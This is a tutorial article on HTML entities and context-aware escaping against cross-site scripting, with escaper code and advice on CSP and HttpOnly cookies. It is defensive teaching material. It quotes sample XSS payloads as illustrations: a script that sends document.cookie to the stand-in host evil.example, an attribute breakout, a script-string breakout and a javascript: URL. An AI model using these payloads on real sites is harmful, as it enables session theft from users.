Most rendering bugs and a large share of web security holes come down to one question: was this text treated as data, or as markup? HTML escaping is how you answer that question consistently, and getting it right is the difference between a clean page and a cross-site scripting (XSS) hole.
What an HTML entity actually is
An HTML entity is a way to represent a character using a sequence of plain ASCII text so the browser doesn't interpret it as part of the markup language. Entities come in two forms:
- Named entities like `&lt;`, `&gt;`, `&amp;`, and `&quot;`. Each maps to a specific character.
- Numeric character references like `&#60;` (decimal) or `&#x3C;` (hexadecimal), both of which produce `<`.
When the browser's parser encounters `&lt;`, it displays a literal `<` instead of treating it as the start of a tag.
The characters that matter
The browser decides what is markup and what is text using a small set of special characters. These are the ones you must be able to neutralize:
| Character | Why it's dangerous | Entity |
|---|---|---|
| `<` | Opens a tag | `&lt;` |
| `>` | Closes a tag | `&gt;` |
| `&` | Starts an entity reference | `&amp;` |
| `"` | Terminates a double-quoted attribute | `&quot;` |
| `'` | Terminates a single-quoted attribute | `&#39;` or `&apos;` |
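The ampersand is the one people forget. If you escape `<` as `&lt;` but leave `&` alone, the browser decodes any entity-like text in the input instead of showing it as typed, so a string such as `Tom &amp; Jerry &lt;b&gt;` cannot be displayed literally. Escape `&` too, and escape it first so the ampersands in the entities you just produced are not escaped again.
Why you escape: the two failure modes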
There are two distinct reasons to escape, and conflating them leads to sloppy fixes.
Broken markup
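If a user types a product review that says `I rate this 3 < 5 stars`, the raw `<` is invalid markup. Depending on the parser, `< 5 stars` may be read as the start of a tag, and the text up to the next `>` can disappear from the rendered page.
Cross-site scripting (XSS)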
Now imagine the user types this instead:
```html
<script>fetch('https://evil.example/steal?c='+document.cookie)</script>
```
If that lands unescaped in your page, the browser executes it. The attacker's JavaScript now runs in your origin, with access to your users' session cookies, local storage, and the full DOM. Escaping `<` to `&lt;` makes the browser display the payload as text instead of running it.
XSS is not exotic. It is almost always plain text that wasn't escaped before being concatenated into HTML.
Context-aware escaping
The single most important idea in this article: escaping depends on where the data lands. "HTML-escape everything" is a good default but an incomplete rule, because HTML has several sub-languages, each with its own special characters.
HTML text content
Between tags, like `<p>HERE</p>`, escape `<`, `>`, and `&`:

```html
<p>3 &lt; 5 &amp; rising</p>
```
HTML attributes
Inside an attribute you also have to escape the quote character that delimits the attribute, or the value can break out:
```html
<!-- Dangerous: value breaks out of the quotes -->
<input value=""><script>alert(1)</script>">

<!-- Safe: quote is escaped -->
<input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
```
Always quote your attributes. An unquoted attribute can be ended by a space, making it far harder to escape safely.
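To make the attribute case concrete, here is a minimal sketch of the breakout payload from the example above being escaped before it is placed in a quoted `value`. The helper name `escapeAttr` is hypothetical, and the sketch assumes the attribute is always quoted.

```javascript
// Hypothetical helper: escapes a value for use inside a quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')  // ampersand first, so entities produced below are not re-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;') // stops breakout from a double-quoted attribute
    .replace(/'/g, '&#39;'); // stops breakout from a single-quoted attribute
}

// The payload tries to close the attribute and the tag, then open a script.
const payload = '"><script>alert(1)</script>';
const html = '<input value="' + escapeAttr(payload) + '">';

console.log(html);
// <input value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">
```

Because the quote is escaped, the whole payload stays inside the attribute value and the browser shows it as text in the input field.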
JavaScript and CSS contexts
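HTML entities do not work inside a `<script>` or `<style>` block, because the browser does not decode entities such as `&lt;` there:

```html
<script>
  // HTML-escaping here does nothing useful and can break the JS
  var name = "USER_INPUT";
</script>
```

If `USER_INPUT` is `";attackerCode();//`, the string literal ends early and the attacker's code runs without a single `<` in the payload. Serialize the value with `JSON.stringify` instead of HTML-escaping it.
URLs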
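A value placed in an `href` or `src` attribute is interpreted as a URL, and HTML escaping does not stop a `javascript:alert(1)` URL from running when it is followed. Validate the scheme against an allowlist such as `http`, `https`, and `mailto`.
The takeaway: pick the escaping function that matches the destination context. The same byte of user input may need a different treatment depending on whether it lands in text, an attribute, a script string, or a URL.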
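As a rough illustration of matching the function to the context, the sketch below covers the two non-HTML destinations: a script string and a URL. The names `toScriptLiteral`, `safeUrl`, and `ALLOWED_SCHEMES` are hypothetical, and replacing `<` with `\u003c` after `JSON.stringify` is an added precaution assumed here, so that a value containing `</script>` cannot close the block.

```javascript
// Hypothetical helper: serialize a value for embedding in an inline <script> block.
function toScriptLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')       // keeps "</script>" in the data from ending the block
    .replace(/\u2028/g, '\\u2028')  // line separators that older JS engines reject in strings
    .replace(/\u2029/g, '\\u2029');
}

// Schemes are compared in the form URL.protocol reports them: lowercase, with a colon.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// Hypothetical helper: returns the normalized URL if its scheme is allowed,
// otherwise a harmless fallback. Relative URLs are rejected in this sketch.
function safeUrl(input, fallback = '#') {
  try {
    const url = new URL(String(input));
    return ALLOWED_SCHEMES.has(url.protocol) ? url.href : fallback;
  } catch {
    return fallback; // not parseable as an absolute URL
  }
}

console.log(toScriptLiteral('";attackerCode();//')); // "\";attackerCode();//"
console.log(safeUrl('JaVaScRiPt:alert(1)'));         // #
console.log(safeUrl('https://example.com/'));        // https://example.com/
```

The output of `safeUrl` still needs attribute escaping when it is written into an `href`; the scheme check and the HTML escape solve different problems.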
Named vs numeric entities
For the security-critical characters, named and numeric entities are interchangeable in effect:
- `&lt;`, `&#60;`, and `&#x3C;` all render `<`.
- `&amp;` and `&#38;` both render `&`.
Practical guidance:
- Named entities are more readable for the common set (`&lt;`, `&gt;`, `&amp;`, `&quot;`). Prefer them in hand-written markup.
- Numeric references are universal. Any Unicode code point can be written as `&#NNNN;` or `&#xHHHH;`, which matters for characters that have no named entity.
- `&apos;` is risky in old contexts. It is valid in HTML5 and XML but was not defined in HTML 4, and it historically failed in older browsers and some email rendering paths. When escaping single quotes defensively, `&#39;` is the safer choice.
A defensive escaper that emits numeric references for the dangerous set is a perfectly reasonable design, and it sidesteps the `&apos;` question entirely.
If you want to inspect exactly what a given snippet decodes to, or convert a block of text to its escaped form, our HTML entity encoder and decoder does the round-trip and runs entirely in your browser, so nothing you paste leaves your device.
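The numeric-reference design mentioned above could look something like the following sketch. The function name `escapeHtmlNumeric` is hypothetical. It handles all five characters in a single pass, so the ordering concern around `&` does not arise.

```javascript
// Hypothetical helper: replaces each dangerous character with its decimal
// numeric character reference (for example "<" becomes "&#60;").
function escapeHtmlNumeric(s) {
  return String(s).replace(/[&<>"']/g, (ch) => '&#' + ch.charCodeAt(0) + ';');
}

console.log(escapeHtmlNumeric(`Tom & "Jerry" <b>it's</b>`));
// Tom &#38; &#34;Jerry&#34; &#60;b&#62;it&#39;s&#60;/b&#62;
```

The output is less readable than named entities, which is the trade-off for never emitting `&apos;`.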
Common mistakes
Escaping on input instead of output
A recurring anti-pattern is to escape data the moment it arrives and store the escaped version in the database. This breaks the moment the same data is used in a non-HTML context: an email, a JSON API, a CSV export, or a PDF. You end up with literal `&amp;` sequences showing up in those outputs. Store the raw value and escape at the point of output.
Double escaping
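If you escape a value twice, `&` becomes `&amp;` and then `&amp;amp;`, and the user sees a literal `&amp;` on the page. Escape exactly once, at the point of output.
Trusting a blocklist of "dangerous" strings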
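Blocklisting `<script>` does not work: attackers switch to `<img src=x onerror=...>` or a mixed-case `JaVaScRiPt:` URL. Escape for the output context instead of trying to enumerate bad input.
Forgetting the attribute quote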
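Escaping `<` and `>` is not enough inside an attribute. An unescaped quote still lets the value break out and add attributes of its own, such as an event handler.
Marking strings as "safe" to silence the framework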
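Every templating system has an escape hatch (`dangerouslySetInnerHTML`, `|safe`, `v-html`, `mark_safe`). Using one on user-controlled data switches off the escaping the framework was doing for you.
A minimal correct escaper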
For HTML text and double-quoted attribute contexts, this small function covers the dangerous set in the correct order:
```javascript
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;') // must be first
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}
```
This is deliberately small. It is correct for text and attribute output, and it is not a substitute for JSON encoding in script contexts or URL encoding in `href` values.
Layers beyond escaping
Escaping is the primary defense, but pair it with a couple of cheap reinforcements:
- A Content-Security-Policy that disallows inline scripts turns many would-be XSS payloads into nothing, even if an escape slips.
- HttpOnly cookies keep session tokens out of reach of any script that does execute.
Neither replaces escaping; both reduce the blast radius when something gets through.
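As a sketch of what those two layers can look like in practice, the helper below sets both headers on a Node.js `http` response. The function name `applySecurityHeaders`, the cookie name `session`, the specific policy string, and the extra `Secure` and `SameSite` attributes are all assumptions for illustration; a real policy depends on what your pages load.

```javascript
// Hypothetical helper: call it in a request handler before writing the body.
// `res` is expected to provide setHeader(name, value), as http.ServerResponse does.
function applySecurityHeaders(res, sessionToken) {
  // script-src without 'unsafe-inline' blocks inline <script> blocks and on* handlers.
  res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");

  // HttpOnly hides the cookie from document.cookie.
  // Secure and SameSite=Lax are additional hardening assumed for this sketch.
  res.setHeader(
    'Set-Cookie',
    'session=' + encodeURIComponent(sessionToken) + '; HttpOnly; Secure; SameSite=Lax; Path=/'
  );
}
```

With these in place, an injected inline script is refused by the browser, and even a script that does run cannot read the session cookie.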
Seeing it in practice
The fastest way to build intuition is to watch escaped and unescaped markup render side by side. Paste a snippet with raw `<` and `&`